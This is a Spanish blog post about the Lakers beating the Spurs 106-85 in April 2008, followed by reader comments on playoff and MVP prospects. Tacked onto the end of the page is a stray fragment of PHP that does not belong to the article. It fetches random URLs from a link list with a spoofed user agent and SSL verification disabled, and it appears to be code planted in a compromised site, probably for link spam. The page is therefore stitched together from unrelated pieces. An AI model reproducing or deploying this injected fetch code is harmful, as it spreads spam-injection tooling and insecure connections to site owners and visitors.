Dudas en los Spurs, hambre en los Lakers

14 de April de 2008 por MagicJohnson32

kobepauhugOs contábamos el sábado que los Lakers se metían de lleno en la lucha por ser primeros del Oeste al término de la fase regular pero con el inevitable regusto agridulce que produce el haber estado apunto de desperdiciar una renta de 30 puntos ante los Hornets. Anoche, sin embargo, los californianos dieron una muestra de poderío en el Staples al pasar por encima de los Spurs, 85-106, en un partido que se presentaba como definitivo de cara al liderato de la Conferencia Oeste más competitiva que se recuerda. Ganar de manera consecutiva a sus dos grandes competidores por el primer puesto parece la mejor manera para los Lakers de encarar unos Playoffs en los que nadie se atreve a dar un favoritismo claro. Sin embargo, tanto en la clasificación como en estado anímico, la victoria de anoche deja a los californianos en primera posición.

Los Spurs, sin Ginóbili, Horry y Barry, sobrevivieron en la primera mitad gracias a Tony Parker, autor durante ese tramo de partido de 18 puntos. El marcador al descanso, 53-53, no escondía la mejor imagen de los locales, algo que se hizo muy evidente a partir del tercer cuarto. Los Lakers salieronkobeturiafcelebrate de los vestuarios dispuestos a mostrar su superioridad y lo hicieron gracias a un nivel defensivo que parecen reservarse para las grandes ocasiones. Vimos a Gasol hacer un soberbio trabajo sobre Duncan, quien erró 13 de sus 19 lanzamientos; vimos también como Parker dejó de encontrar facilidades en la segunda parte, en la que sólo fue capaz de anotar dos puntos; pudimos comprobar el buen momento que atraviesa Odom, especialmente agresivo en el rebote defensivo y con confianza para atacar el aro; y Bryant, el día en que Spike Lee le siguió a todas partes con una vídeo-cámara para la filmación de un documental, volvió a dar muestras de la confianza y el entusiasmo que le suscita el equipo y la situación en la que encara el tramo final, incluso con todas las dudas que existen alrededor del regreso de Bynum y Ariza.

Los Spurs fallaron 25 de sus primeros 30 lanzamientos de la segunda mitad. Para entonces, los Lakers habían abierto una brecha más que definitiva; a Kobe, que se despidió del partido con un triple sobre la bocina del tercer cuarto tras un pase largo de Gasol, ya le estaban aplicando hielo en la rodilla; y era Turiaf el encargado de levantar al público de sus asientos con su habitual entusiasmo y su no tan habitual acierto. Las lecturas que se han de hacer de la victoria angelina y la derrota texana no han de ir, ni mucho menos, más allá de un partido importante de regular season. Sin embargo, las señales que emitieron uno y otro equipo fueron bien diferentes y, a escasos días del inicio de los Playoffs, los Spurs han de preocuparse por las últimas tduncantparkerbenchderrotas cosechadas ante Jazz, Suns y Lakers, en las que apenas han anotado 76 puntos por partido y han perdido por una diferencia media de más de 21 puntos.

Por supuesto, a nadie le extrañaría que, con el regreso de Ginóbili y la llegada de los Playoffs, San Antonio volviese a ofrecer la imagen de equipo rocoso, casi indestructible. Pero en un partido tan importante como el de anoche, en el que se jugaban ser primeros de Conferencia y tener ventaja de campo en todas las eliminatorias del Oeste, el equipo dio una imagen gris y de falta de hambre. Todo lo contrario que su rival, unos Lakers que, tras 3 años sin acceder a la segunda ronda de Playoffs, celebraron un triunfo que les deja a un paso de encabezar el Oeste al término de los 82 encuentros de regular season.daddympv

Para ello necesitan ganar a Sacramento en el partido que les enfrentará mañana martes en el Staples Center. Seguro que Ron Artest estaría encantado de aguar la fiesta angelina y, de paso, dar un poco de brillo a su temporada antes de afrontar un verano como agente libre. Los Lakers no pueden permitirse la más mínima relajación. Se juegan demasiado, tanto como ser primeros del Oeste y dejar sin excusas a quienes dudan de votar a Kobe Bryant para su primer MVP.

Comenta

4 comentarios a esta entrada

  1. Elio dice:
    #1

    Geniales Lakers anoche!! Me gustaron mucho por su defensa, selección de tiro, rebote y hambre. Kobe es el MVP de la Regular Season, no hay duda.

    Yo veo a L.A. en las Finales, no se vosotros.

      Citar

  2. Gallis dice:
    #2

    Decía Deer en el foro que los Lakers son el único equipo que se puede reforzar en Playoff. Es cierto, si pensamos en los últimos meses. Pero si nos fijamos solo en los últimos días, SA también puede reforzarse. Barry, Horry y sobre todo Manu serán fundamentales en PO´s, y más les vale, porque es cierto, como dices, que la imagen de ayer fue de falta de ambición…

    En cambio, los Lakers creo que no llegaron al nivel de la primera parte contra NO, pero la imagen general es mejor. Muy serios y muy centrados. Desde luego, salvo cagada contra Sacramento, vencer en 3 días a NO y SA es una muy buena manera de afrontar los Playoffs…

    Por cierto, habéis visto como de bajos lleva los pantalones Turiaf en la foto??? jajajajaja…

      Citar

  3. TheDeerHunter dice:
    #3

    En efecto, SA también va a reforzarse de manera inmediata… aunque consideraba que sus ausencias han sido más que nada puntuales.
    Para mí lo de anoche únicamente es significativo con respecto a la imagen de LA. Todos hicieron bien su trabajo excepto Radmanovic, que debería estar preocupado que todo quisqui le pase en importancia para el equipo. Todavía tengo esperanzas que reaccione justo en playoffs, pero pocas…

    Con respecto a SA. No le doy ningún valor a la pésima imagen que mostraron… por muchos motivos.
    Pero si por una de esas les toca Suns en primera ronda con desventaja campo van a sudar sangre. El juego interior que se vió ayer (por mucho Horry que vuelva) es para preocuparse.

      Citar

  4. MagicJohnson32 dice:
    #4

    Elio, si Lakers confirma su primer puesto ganando a los Kings, no me quedan muchas dudas de que Kobe será el MVP. En temporadas anteriores fue el mejor pero Lakers no acabó muy arriba y los compañeros no respondieron. Este año, Kobe sigue brillando, ha hecho mejores a sus compañeros y parece que los Lakers acabarán primeros.

    Y sobre las Finales… buf, es que el Oeste es tan brutal que parece arriesgado aventurar algún favorito. A mí me encanta la posición en la que llegan los Lakers, y si volviesen Bynum y Ariza estaría eufórico, pero sin ellos vamos justitos por dentro. Y podemos pagarlo, salvo que Gasol se deje los huevos como ante Duncan y demuestre que puede ser un factor defensivo para bien.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>